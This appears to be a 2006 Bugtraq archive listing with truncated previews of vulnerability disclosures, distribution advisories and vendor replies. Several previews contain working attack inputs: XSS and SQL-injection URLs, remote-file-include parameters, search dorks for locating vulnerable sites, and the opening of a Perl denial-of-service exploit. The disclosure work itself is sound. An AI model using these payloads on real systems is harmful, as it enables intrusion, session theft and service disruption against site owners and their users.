Dear c0ntex,
--Friday, May 26, 2006, 11:12:41 AM, you wrote to [EMAIL PROTECTED]:
c> Since ASLR has been in and has been trivially circumvented in Linux
c> for years now (see my papers on return-to-libc & return-to-got) I
c> don't see it being a particularly hard issue to defeat :-) Maybe
c>
Is this the same vulnerability?
http://www.securityfocus.com/bid/5954
On 25 May 2006 13:35:13 -, [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:
#!/usr/bin/perl
#my Web Server << v-1.0 Denial of Service Exploit
#vendor : Eitsop.s5.com
use IO::Socket;
use strict;
my($socket) = "";
if($s
On Wed, 24 May 2006, Mike O'Connor wrote:
> :Sun says it is jabber, which is why I put it quotes. Since they have not
> :replicated in lab, they are jumping to conclusions. Yes, I agree,
> :it is very specific and the backline engineer usage appears 'stretching
> things'
> Most Sun adapters have
Although it is a well known fact that Windows desktops and servers still
use LM Hashes and cache the last ten userids and passwords locally, just
in-case an Active Directory, Domain, or NDS tree are not available, has
anyone thought about the consequences of this issue in a hot-desking, or
flexible
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:092
http://www.mandriva.com/security/
___
We appreciate your comments,
Did you check truecrypt video ?
http://www.safehack.com/Advisory/truecrypt/truecrypt.html
We are not saying maybe it is documented feature. We did not see that and the
objective was not to test truecrypt but it was to test pgp. It was a trial on
truecrypt and we re
On Wed, 24 May 2006 [EMAIL PROTECTED] wrote:
> Steps to access PGP Encrypted Disk (Passphrase) using a Backdoor type attack
> [...]
> * Now say you give that disk to someone and they changed the
> passphrase on it. You can still access it
Intuitively, the system works as follows: a rando
while doing some work using php, i found something interesting which
possibbly can be use to exploit this kind of bug. Instead of injecting
carriage return chr(0x13) you can also inject php terminate code( ?> ) to
stop one line comment (// or #) in php (tested on 5.1.4 on windows).
ex:
O
Homepage:
http://www.tuttophp.altervista.org/morrisguest-ing.htm
Description:
Morris Guestbook is a text-based guestbook with the following features: Data
storing on text file, paging of messages on screen, words crypting, counting of
inserted messages, blockage of messages with both html t
Homepage:
http://www.tuttophp.altervista.org/smileguest-ing.htm
Description:
Smile Guestbook is a cool text-based guestbook with smilies inserting and other
features below
Effected files:
view.php
An XSS attack is possible due to no filtering of pagina variable:
http://www.example.com/p
Homepage:
http://www.tuttophp.altervista.org/main.php
Description:
Text-based guestbook with the following features: - Data storing on text file -
Paging of messages on screen - Blockage of messages with words too long into -
Blockage of messages with both html tags(<>) - Validity-checking of
MyYearBook.com - Personal community site like myspace.com
Effected files:
Input forms of:
editing profile
posting a blog
search boxes
posting a bulletin
posting a comment
---
XSS Vulnerabilities proof of concept:
When editing your profile, it seems
I forgotten to say that IE6 SP2 is not affected.
I've successfully tested in english version of Windows XP pro SP2 with IE 6.
it's very strange...
2006/5/25, r0xes <[EMAIL PROTECTED]>:
Nope. Also, doesn't work on WinXP Home Sp2 with IE 6.
=\
Maybe it is only Windows ___yourlanguage__ ?
On 5/24/06, unknown user < [EMAIL PROTECTED]> wrote:
>
Vacation Retal Script v1.0
Homepage:
http://www.vacationrentalscript.com/
Description:
Vacation Rentals is the best solution for your vacation rental online business.
Its easy to install, easy to use, provides lots of features and option
details. Just check the online demo and convince you
Super Link Exchange Script v1.0
Homepage:
http://www.ebizunion.com/guidetosuper.php
Description:
Main Features: 1. Add unlimited nested category/sub-category, 2. Can check
reciprocal link back, 3. Can hide and delete no link back sites. 4. Template
can be edited and suitable to fit your cur
PHPSimple Choose v0.3
Homepage:
http://phpsimplechoose.sourceforge.net
Description:
Do you need to add some fun to your site? Look no further. With
PHPSimpleChoose you can let your users input terms and have one randomly
choosen. Every bit of text is changeable, and we are working on al
iBoutique.MALL
Homepage: http://www.netartmedia.net/mall/
Description:
Based on iBoutique 4.0, iBoutique.MALL is a powerful multi user mall software
solution. It makes possible for the new vendors to signup and create their own
customized online stores with ease.
Effected files: index.ph
Some link on the website Vodafone.de contains
a little vulnerability that could be used for
illegal purposes.
It could be used for phishing or other purposes.
hxxp:// website /simlock/servlets/sim?IMEI=[XSS-Code Here]
hxxps:// website /simlock/servlets/sim?IMEI=[XSS-Code Here]
Actually
rPath Security Advisory: 2006-0080-1
Published: 2006-05-24
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Local System User Deterministic Vulnerability
Updated Versions:
postgresql=/[EMAIL PROTECTED]:devel//1/8.1.4-1-0.1
postgresql-server=/[EMAIL PROTECTED]:devel/
There is nothing to fix here, there is no vulnerability. Please visit the
following post from the official Kaspersky Lab forum:
http://forum.kaspersky.com/index.php?showtopic=14734&view=findpost&p=120857
i disable my all of IE plugins and restart IE and test again.
but, exploit worked.
how about refresh the exploit page, and retry click on exploit page?
p.s do you using any antivirus program? if you do, how about disable
antivirus program, and retry click on exploit page?
2006/5/25, s89df987 s9
Here is some information about the issue with PGP and Truecrypt. We cannot
speak for the Truecrypt people, but much of the explanation applies to their
software as well as ours.
We are disappointed that the people who developed this report released it in a
web site and on bugtraq before contac
: Affected Packages: Corrected Packages:
OpenPKG CURRENT <= binutils-2.16.1-20060101 >= binutils-2.16.1-20060526
OpenPKG 2.5 <= binutils-2.16.1-2.5.0>= binutils-2.16.1-2.5.1
OpenPKG 2.4 <= binutils-2.16.1-2.4.0>= binutils-2.16.1-2.4.1
Descripti
XSS (Cross Site Scripting) on My6D Connection Work System.
We Can Run JScript & HTML Codes & META Tags etc...
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=alert('SPYMETA%20WAS%20HERE%20!')
We Can Direct The Page Our Hacked Index
Example :
http://www.my6d.
do you click on the exploit page?
if you don't, you must click on the exploit page.
also, if you run this exploit in local, must activate active content.
but if you do(and doesn't crashed), how about refresh the exploit
page, and retry click on exploit page?
i think it will be work.
2006/5/25,
On Mon, 22 May 2006, Mike O'Connor wrote:
> Doug,
>
> :> :ping another device with interpacket delay of 0 and a count
> ...
> :> Define what you mean by "interpacket delay". Are you referring to an
> ...
> :cisco router. extending ping. 0 delay.
> :I was speaking of cisco ping.
> :I should have s
Advisory : Cross Site Scripting in Seditio (http://www.neocrome.net)
Release Date : 24/05/2005
Last Modified : 24/05/2005
Author: Yunus Emre Yilmaz ( http://yns.zaxaz.com)
Application : Seditio v102 ( maybe older versions)
Risk : Critical
Problem :
Ldu's logging
This bug was not discovered by SnoB[http://www.cyber-security.org] !
It was posted long before yours and has the same description and input
examples. Seems like you have stolen it. That's really lame!
Here are the original issues:
(Take a look on the release date)
http://www.securi
This is not vulneability because KIS includes firewall for breaking of
self-made downloaders :)
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECTİON
### http://[target]/[path]/userview.asp?startletter=SQL TE
Assetman <= 2.4a XSS
Discovered by: Nomenumbra
Date: 23/5/2006
impact:moderate (privilege escalation,possible defacement)
Assetman doesn't filter any of it's input, allowing users
to inject arbitrary HTML or javascript code.
Nomenumbra
ByteHoard <= 2.1 multiple vulnerabilities
Discovered by: Nomenumbra
Date: 23/5/2006
impact:high (file manipulation,privilege escalation,possible defacement)
ByteHoard versions up to 2.1 are prone to multiple vulnerabilities, including
directory traversal.
[0x00] Directory traversal:
User
PHP AGTC-Membership system <= v1.1a XSS
Discovered by: Nomenumbra
Date: 23/5/2006
impact:moderate (privilege escalation,possible defacement)
Ordinary users can add users to the user management system as well,
or change their own email address, which isn't properly sanitized, thus
allowing X
PHPResidence <= 0.6 XSS
Discovered by: Nomenumbra
Date: 23/5/2006
impact:moderate (privilege escalation,possible defacement)
PHP Residence software doesn't sanitize any of it's input,
allowing a malicious attacker (providing he/she has an account)
to inject arbitrary HTML or javascript code
Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford
Vulnerable File/Code
./plume-1.0.3/manager/frontinc/prepend.php
[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]
http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_p
pack.
>
>
> o Credits:
>
> =
>
>
> Thomas Waldegger <[EMAIL PROTECTED]>
>
> BuHa-Security Community - http://buha.info/board/
>
>
> If you have questions, suggestions or criticism about the advisory feel
>
> free to send me a
Isn't the SQL injection vulnerability a bit more critical here?
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
Sent: Tuesday, May 23, 2006 7:39 PM
To: bugtraq@securityfocus.com
Subject: Realty Pro One Property Listing Script
Realty Pro One
http://realtypro1.2run2.
Multiple XSS Vulnerabilities in Tikiwiki 1.9.x
Discovered by Blwood
http://www.blwood.net
** Public **
-
Tiki-lastchanges
http://www.site.com/tiki-lastchanges.php?days=3&offset=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert('Blwood')%3C/scr%3C/script%3Eipt%3E
h
#!/usr/bin/perl
#my Web Server << v-1.0 Denial of Service Exploit
#vendor : Eitsop.s5.com
use IO::Socket;
use strict;
my($socket) = "";
if($socket = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
ENGLISH
# Title : Tamber Forum <= 1.9.13 Multiple SQL Injection Vulnerabilities
# Author : ajann
# Exploit;
SQL INJECTİON
###http://[target]/[path]/show_forum.asp?frm_id=55'SQL TEXT
###http://[target]/[path]/forum_search.asp S
[MajorSecurity]Socketmail <= 2.2.6 - Remote File Include Vulnerability
Software: Socketmail
Version: <=2.2.6
Type: Remote File Include Vulnerability
Date: May, 25th 2006
Vendor: Creative Digital Resources
Page: http://socketmai
Pls qjForum to Register and Log İn
# Title : qjForum(member.asp) SQL Injection Vulnerability
# Author : ajann
# Dork : "qjForum"
# Exploit;
SQL
###
http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,
SOFTWARE
==
phpjobboard
DESCRIPTION:
job board administration bypass, and edit or add to new job.
example
http://[target]/phpjobboard or your
path/admin.php?menu=job&adminop=job-edit&id=[item id]
greets iskorpitx(best),
ENGLISH
# Title : Toast Forums 1.6.44 in Xss
# Author : ajann
# Exploit;
XSS Example
### Forum Post Message,Reply..
Alert: xxx.com /
# ajann,Turkey
TURKISH
# Baslık : Toast Forums 1.6.44 in Xss
# Acığı Bulan : ajann
# Acık bulunan dosyalar;
### Foruma
ENGLISH
# Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities
# Dork : "Copyright 2004 easy-content forums"
# Author : ajann
# Exploit;
SQL INJECTİON
### http://[target]/[path]/userview.asp?startletter=SQL TE
XSS in Monster Top List | MTL 1.4
-
Software :
Monster Top List
-
version :
Monster Top List 1.4
-
Exploit :
www.site.com/index.phpuser_error_message=[XSS-CODE]
-
Dear [EMAIL PROTECTED],
Sorry, but I see no security vulnerability here.
Disk encryption usually works this way:
1. Disk is divided to blocks (or files). Each block is encrypted with
random symmetric key to extend security and encryption/description
speed.
2. Block key is encrypted
Vulnerable Script: Docebo LMS 2.05
Discovered: beford
Noobs: %22Based+on+DoceboLMS+2.0%22
Vulnerable Files
doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/mod
Hi together,
This also works on serveral web-pages of this product.
http://host/OmegaMw7a.ASP?WCI=Logon&WCE=0;alert(unescape(document.cookie));
There might be some ways for SQL-Injection, too, but i am not willing
to try this at the real system :)
Vendor notified as CC
regards
MC.Iglo
:Sun says it is jabber, which is why I put it quotes. Since they have not
:replicated in lab, they are jumping to conclusions. Yes, I agree,
:it is very specific and the backline engineer usage appears 'stretching things'
Most Sun adapters have an actual jabber counter that netstat -k will
spew ou
:Beyond netstat -k, you can probably use lockstat or other kernel
:profiling tools as I mentioned in my earlier post to give them a
:good idea of where the bug really is. Interrupt issues aren't
:always going to be cut and dried. There could be some particular
:flavor of IOS, network adapter, m
There is no vulneability.
POP3 antivirus is not developed for counteraction of trojan-downloaders. These
actions are stopping by firewalls (for example, Kaspersky Internet Security
6.0: Anti-Hacker), proactive defence (Kaspersky Anti-Virus 6.0 and Kaspersky
Internet Security 6.0: Proactive Defe
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1075-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
May 26th, 2006
On 26/05/06, David Litchfield <[EMAIL PROTECTED]> wrote:
Address Space Layout Randomization is now part of Vista as of beta 2 [1] . I
wrote about ASLR on the Windows platform back in September last year [2] and
noted that unless you rebase the image exe then little (not none!) is added.
ASLR in V
Address Space Layout Randomization is now part of Vista as of beta 2 [1] . I
wrote about ASLR on the Windows platform back in September last year [2] and
noted that unless you rebase the image exe then little (not none!) is added.
ASLR in Vista solves this so remote exploitation of overflows has
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160
---
| BuHa Security-Advisory #13|May 25th, 2006 |
---
| Vendor | MS Internet Explorer 6.0 |
| URL | http://www.mic
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160
---
| BuHa Security-Advisory #12|May 25th, 2006 |
---
| Vendor | MS Internet Explorer 6.0 |
| URL | http://www.mic
Script: V-Webmail 1.6.4
Vendor: http://www.v-webmail.org/
Description: V-webmail is a powerful PHP based webmail application with an
abundance of features, including many innovative ideas for web applications
Discovered: beford
Vulnerable File
v-webmail/includes/pear/*/*.php => require_once ($CO
Webmaster at destiney said:
> I pasted the following example XSS code into both form fields, and saw
> no evidence of XSS vulnerabilities:
>
>
According to the XSS cheat sheet at http://ha.ckers.org/xss.html,
STYLE attributes in DIV tags are only effective in the Internet
Explorer rendering en
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1077-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
May 26th, 2006
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1076-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
May 26th, 2006
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Trustix Secure Linux Security Advisory #2006-0030
Package names: kernel, quagga
Summary: Multiple vulnerabilities
Date: 2006-05-26
Affected versio
Hello,
This is an official response from the TrueCrypt development team.
First, this is not a security bug. It is a known, documented and
expected feature. It is utilized, for example, for the volume header
backup/restore operation.
Quotes from the TrueCrypt documentation:
"WARNING: Restoring
Addendum to my previous letter:
Note that this design (master key encrypted with header key) is common
and has been used for many years by many products (for example,
Scramdisk, E4M, etc.)
The main advantage of the design is that the user can change his
password within a few seconds without h
65 matches
Mail list logo